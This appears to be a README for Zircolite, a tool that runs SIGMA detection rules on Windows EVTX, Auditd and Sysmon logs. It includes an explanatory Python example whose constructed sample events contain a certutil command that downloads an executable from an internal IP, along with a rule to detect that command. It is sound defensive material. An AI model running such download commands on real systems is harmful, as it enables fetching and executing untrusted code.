Standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for Linux or JSONL/NDJSON logs
Zircolite is a standalone tool written in Python 3. It lets you run SIGMA rules on MS Windows EVTX (EVTX and JSONL format), Auditd logs and Sysmon for Linux logs.
- Zircolite can be used directly on the investigated endpoint (use the releases) or in your forensic/detection lab
- Zircolite is fast and can parse large datasets in just seconds (check benchmarks)
Requirements / Installation
You can install dependencies with:
pip3 install -r requirements.txt
evtx_dump is used by default because it is currently much faster, but it is optional: if you do not want to use it, pass the
--noexternal option. The binary is provided when you clone the Zircolite repository (the official evtx_dump repository is here).
EVTX files :
Help is available with zircolite.py -h. If your EVTX files have the extension “.evtx”:
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules>
python3 zircolite.py --evtx sysmon.evtx --ruleset rules/rules_windows_sysmon.json
The Sysmon ruleset used here is a default one, meant for logs coming from endpoints where Sysmon is installed. A generic ruleset is available too.
Auditd logs :
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules> --auditd
python3 zircolite.py --evtx auditd.log --ruleset rules/rules_linux.json --auditd
Sysmon for Linux logs :
python3 zircolite.py --evtx <EVTX_FOLDER/EVTX_FILE> --ruleset <Converted Sigma rules> --sysmon4linux
python3 zircolite.py --evtx sysmon.log --ruleset rules/rules_linux.json --sysmon4linux
JSONL/NDJSON files :
python3 zircolite.py --evtx <JSON_FOLDER/JSON_FILE> --ruleset rules/rules_windows_sysmon.json --jsononly
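All of the invocations above share one mechanism: every event is flattened into a row of an SQLite table, and the "converted Sigma rules" are SQL queries run against that table. The following added example (not Zircolite's own code, and not a replacement for the commands above) shows that mechanism in miniature on constructed evtx_dump-style JSONL events. The prefix stripping, the rule JSON layout (title, level, rule) and the sample events are simplifications and assumptions; the real field mapping and ruleset schema carry more detail. It also shows the failure mode you will hit with a mismatched ruleset, a query naming a field the data does not have, which is skipped rather than aborting the run.

```python
"""Miniature of the Zircolite pipeline: flatten JSONL events into an SQLite
table, then run converted (SQL) Sigma rules against it.  Added example,
not Zircolite's own code."""
import json
import sqlite3

# Constructed sample input (not real telemetry): three Sysmon-style events
# shaped like evtx_dump JSONL output, one JSON object per line.
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    {"Event": {"System": {"EventID": 1, "Computer": "WS01"},
               "EventData": {"Image": r"C:\Windows\System32\cmd.exe",
                             "CommandLine": "cmd.exe /c whoami",
                             "ParentImage": r"C:\Windows\explorer.exe"}}},
    {"Event": {"System": {"EventID": 1, "Computer": "WS01"},
               "EventData": {"Image": r"C:\Windows\System32\certutil.exe",
                             "CommandLine": "certutil.exe -urlcache -split -f http://10.0.0.5/a.exe a.exe",
                             "ParentImage": r"C:\Windows\System32\cmd.exe"}}},
    {"Event": {"System": {"EventID": 3, "Computer": "WS01"},
               "EventData": {"Image": r"C:\Windows\System32\svchost.exe",
                             "DestinationPort": 443}}},
])

# Hypothetical converted rules (assumption: a real ruleset carries more
# metadata; the "rule" list of SQL queries is the part that matters here).
# No ESCAPE clause, so backslashes in LIKE patterns are literal.
RULES = [
    {"title": "Certutil Download", "level": "high", "rule": [
        r"SELECT * FROM logs WHERE EventID = 1 AND Image LIKE '%\certutil.exe' "
        r"AND CommandLine LIKE '%urlcache%'"]},
    {"title": "Whoami Execution", "level": "medium", "rule": [
        r"SELECT * FROM logs WHERE EventID = 1 AND CommandLine LIKE '%whoami%'",
        r"SELECT * FROM logs WHERE EventID = 1 AND Image LIKE '%\whoami.exe'"]},
    {"title": "Lnk File Written", "level": "low", "rule": [
        r"SELECT * FROM logs WHERE EventID = 11 AND TargetFilename LIKE '%.lnk'"]},
]

# Simplified field mapping (assumption): drop the evtx_dump envelope prefixes
# so rules can refer to EventID, Image, CommandLine ... directly.
STRIP_PREFIXES = ("Event.System.", "Event.EventData.")


def flatten(obj, prefix=""):
    """Turn nested JSON into a flat {dotted_key: scalar} dict."""
    out = {}
    if isinstance(obj, dict):
        for key, value in obj.items():
            out.update(flatten(value, f"{prefix}{key}."))
        return out
    key = prefix[:-1]
    for p in STRIP_PREFIXES:
        if key.startswith(p):
            key = key[len(p):]
            break
    # Lists cannot be stored in SQLite as-is; keep them as a JSON string.
    out[key] = json.dumps(obj) if isinstance(obj, list) else obj
    return out


def load_jsonl(text):
    """Parse NDJSON text into a list of flattened events (blank lines ignored)."""
    return [flatten(json.loads(line)) for line in text.splitlines() if line.strip()]


def build_db(events):
    """Create an in-memory table "logs" whose columns are the union of all
    field names seen; fields missing from an event become NULL."""
    columns = sorted({k for e in events for k in e})
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    cols_sql = ", ".join(f'"{c}"' for c in columns)
    db.execute(f"CREATE TABLE logs ({cols_sql})")
    db.executemany(
        f"INSERT INTO logs ({cols_sql}) VALUES ({', '.join('?' * len(columns))})",
        [[e.get(c) for c in columns] for e in events])
    return db


def run_rules(db, rules):
    """Return {rule title: [matching rows as dicts]} for rules with hits.
    A query naming a field absent from this dataset raises OperationalError
    ("no such column"); it is skipped instead of aborting the whole run,
    since it only means that rule cannot apply to this log source."""
    results = {}
    for rule in rules:
        hits = []
        for query in rule["rule"]:
            try:
                hits.extend(dict(row) for row in db.execute(query))
            except sqlite3.OperationalError:
                continue
        if hits:
            results[rule["title"]] = hits
    return results


def detect(jsonl_text, rules):
    """Full pipeline: JSONL text + converted rules -> matches per rule."""
    return run_rules(build_db(load_jsonl(jsonl_text)), rules)


if __name__ == "__main__":
    for title, rows in detect(SAMPLE_JSONL, RULES).items():
        print(f"{title}: {len(rows)} hit(s)")
        for row in rows:
            print("   ", row.get("Image"), "|", row.get("CommandLine"))
```

Running the file reports one hit each for "Certutil Download" and "Whoami Execution" and nothing for the LNK rule, whose TargetFilename column does not exist in this process-creation data. The same thing happens when you point a Sysmon ruleset at plain Security-log EVTX: the rules are not wrong, the fields are simply not there, which is why the ruleset chosen on the command line should match the log source.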
If you want to try the tool you can test with these samples:
Everything is here.
Tutorials, references and related projects
César Marín has published a tutorial in Spanish here
EU ATT&CK Workshop October 2021
Michel de CREVOISIER is doing amazing work with SIGMA, MITRE ATT&CK and other projects. Check his work on mapping EVTX onto the MITRE ATT&CK framework.
The Mini-GUI can be used totally offline; it allows the user to display and search results. To learn how to use the Mini-GUI, check the docs here.
Zircolite has been used to perform cold analysis (in a lab) on EVTX in multiple “real-life” situations. It has also been used many times to perform analysis directly on a Microsoft Windows endpoint; however, there is not yet a pipeline to thoroughly test every release.